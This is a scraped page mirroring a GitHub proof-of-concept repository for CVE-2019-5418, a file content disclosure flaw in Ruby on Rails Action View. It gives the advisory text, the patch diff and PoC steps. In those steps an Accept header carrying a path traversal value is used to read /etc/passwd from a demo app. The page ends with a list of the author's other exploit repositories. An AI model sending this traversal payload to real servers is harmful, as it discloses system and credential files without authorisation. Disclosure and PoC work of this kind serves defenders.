mpgn/CVE-2019-5418 mpgn/CVE-2019-5418

  • Stars
    star
    192
  • Rank 197,325 (Top 4 %)
  • Language
  • Created over 5 years ago
  • Updated about 3 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
mpgn/CVE-2019-5418
github

mpgn

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

CVE-2019-5418 - File Content Disclosure on Ruby on Rails

CVE-2019-5418 - File Content Disclosure on Rails

EDIT: this CVE can lead to a Remote Code Execution, more info: https://github.com/mpgn/Rails-doubletap-RCE

There is a possible file content disclosure vulnerability in Action View. Specially crafted accept headers in combination with calls to render file: can cause arbitrary files on the target server to be rendered, disclosing the file contents.

The impact is limited to calls to render which render file contents without a specified accept format. Impacted code in a controller looks something like this:

found by John Hawthorn from GitHub

image

Technical Analysis:

Security Advisory:

Fixed in Action View 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1

From f4c70c2222180b8d9d924f00af0c7fd632e26715 Mon Sep 17 00:00:00 2001
From: John Hawthorn <[email protected]>
Date: Mon, 4 Mar 2019 18:24:51 -0800
Subject: [PATCH] Only accept formats from registered mime types

[CVE-2019-5418]
[CVE-2019-5419]
---
 .../lib/action_dispatch/http/mime_negotiation.rb   |  5 +++++
 actionpack/test/controller/mime/respond_to_test.rb | 10 ++++++----
 .../new_base/content_negotiation_test.rb           | 14 ++++++++++++--
 3 files changed, 23 insertions(+), 6 deletions(-)

diff --git a/actionpack/lib/action_dispatch/http/mime_negotiation.rb b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
index 498b1e669576..4e81ba12a58b 100644
--- a/actionpack/lib/action_dispatch/http/mime_negotiation.rb
+++ b/actionpack/lib/action_dispatch/http/mime_negotiation.rb
@@ -79,6 +79,11 @@ def formats
           else
             [Mime[:html]]
           end
+
+          v = v.select do |format|
+            format.symbol || format.ref == "*/*"
+          end
+
           set_header k, v
         end
       end

Proof Of Concept

  1. Run the vulnerable application inside the demo folder:
foo@bar:~$ cd demo/
foo@bar:~$ bundle install
[...]
foo@bar:~$ rails s                                                                                                                12:59:54
=> Booting Puma
=> Rails 5.2.1 application starting in development 
=> Run `rails server -h` for more startup options
Puma starting in single mode...
* Version 3.12.0 (ruby 2.5.1-p57), codename: Llamas in Pajamas
* Min threads: 5, max threads: 5
* Environment: development
* Listening on tcp://0.0.0.0:3000
Use Ctrl-C to stop
Started GET "/" for 127.0.0.1 at 2019-03-16 13:00:00 +0100
Processing by Rails::WelcomeController#index as HTML
  Rendering /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb
  Rendered /var/lib/gems/2.5.0/gems/railties-5.2.1/lib/rails/templates/rails/welcome/index.html.erb (1.4ms)
Completed 200 OK in 8ms (Views: 2.7ms | ActiveRecord: 0.0ms)


Started GET "/chybeta" for 127.0.0.1 at 2019-03-16 13:00:03 +0100
Processing by ChybetaController#index as HTML
  Rendering README.md within layouts/application
  Rendered README.md within layouts/application (0.2ms)
Completed 200 OK in 122ms (Views: 121.1ms | ActiveRecord: 0.0ms)
  1. Go to the route /chybeta
  2. Intercept with burp the request and replace the Accept header with Accept: ../../../../../../../../../../etc/passwd{{

image

image

More Repositories

1

BackupOperatorToDA

From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller
C++
378
star
2

Padding-oracle-attack

πŸ”“ Padding oracle attack against PKCS7 πŸ”“
Python
316
star
3

Spring-Boot-Actuator-Exploit

Spring Boot Actuator (jolokia) XXE/RCE
Java
316
star
4

poodle-PoC

🐩 Poodle (Padding Oracle On Downgraded Legacy Encryption) attack CVE-2014-3566 🐩
Python
243
star
5

CVE-2019-0192

RCE on Apache Solr using deserialization of untrusted data via jmx.serviceUrl
Python
212
star
6

ByP-SOP

πŸ΄β€β˜ οΈ Bypass Same Origin Policy with DNS-rebinding to retrieve local server files πŸ΄β€β˜ οΈ
HTML
194
star
7

CVE-2019-19781

CVE-2019-19781 - Remote Code Execution on Citrix ADC Netscaler exploit
Python
157
star
8

CVE-2019-7238

πŸ±β€πŸ’» Poc of CVE-2019-7238 - Nexus Repository Manager 3 Remote Code Execution πŸ±β€πŸ’»
Python
151
star
9

Rails-doubletap-RCE

RCE on Rails 5.2.2 using a path traversal (CVE-2019-5418) and a deserialization of Ruby objects (CVE-2019-5420)
Ruby
134
star
10

discord-e2e-encryption

πŸ”‘ Tampermonkey script that encrypt and decrypt your messages on Discord πŸ”‘
JavaScript
86
star
11

heartbleed-PoC

πŸ’” Hearbleed exploit to retrieve sensitive information CVE-2014-0160 πŸ’”
Python
77
star
12

BEAST-PoC

πŸ’ͺ Proof Of Concept of the BEAST attack against SSL/TLS CVE-2011-3389 πŸ’ͺ
Python
67
star
13

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13
59
star
14

CVE-2019-7609

RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer
51
star
15

CVE-2019-9580

CVE-2019-9580 - StackStorm: exploiting CORS misconfiguration (null origin) to gain RCE
HTML
32
star
16

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6
32
star
17

astudiaeth

Master CSI
TeX
28
star
18

CRIME-poc

πŸ”ͺ CRIME attack PoC : a compression oracle attacks CVE-2012-4929 πŸ”ͺ
Python
28
star
19

CVE-2018-16341

CVE-2018-16341 - Nuxeo Remote Code Execution without authentication using Server Side Template Injection
Python
25
star
20

ntlmrelayx-prettyloot

Convert the loot directory of ntlmrelayx into an enum4linux like output
Python
22
star
21

CVE-2018-19276

CVE-2018-19276 - OpenMRS Insecure Object Deserialization RCE
Python
17
star
22

HallOfFame-Root-me.org

πŸ’€ Root-me Hall Of Fame dashboard πŸ’€
Python
15
star
23

DllInjectExec

πŸ’‰ Dll injection for executable file πŸ’‰
C++
14
star
24

Slanger-RCE

RCE in Slanger using deserialization of Ruby objects
Python
12
star
25

CVE-2018-3760

Rails Asset Pipeline Directory Traversal Vulnerability
9
star
26

ropycat

Scripts that allow you to copy/past text into another Windows process to bypass Citrix copy/paste limitation
C#
9
star
27

CVE-2019-9978

CVE-2019-9978 - RCE on a Wordpress plugin: Social Warfare < 3.5.3
9
star
28

discourse-cookie-token-domain

πŸͺ Allow to setup cookie token to authenticate user πŸͺ
Ruby
8
star
29

CVE-2018-11686

CVE-2018-11686 - FlexPaper PHP Publish Service RCE <= 2.3.6
Python
7
star
30

ShareP0wn

ShareP0wn
Python
7
star
31

YTC-ID

πŸ“Œ Get the YouTube channel ID ! πŸ“Œ
HTML
5
star
32

DllInjectService

πŸ’‰ Dll ready to be injected into a service πŸ’‰
C++
5
star
33

copper-jekyll-theme

Copper Jekyll theme - simple and useful
CSS
5
star
34

docker_dashboard

Python
4
star
35

impacket-cme

Python
2
star
36

swindle

Swindle is a project for YouTube Network
PHP
2
star
37

AChat-Reverse-TCP-Exploit

Tested on AChat 0.150 Beta 7 Windows 7/8/10 x86/x64
Python
2
star
38

Ipsum

Small app for YouTube Network. Get a free submit form for YouTube Channel who want join your network. With AngularJS
JavaScript
1
star
39

Pyrox

For Youtube Network with YouTube API V3 Public
PHP
1
star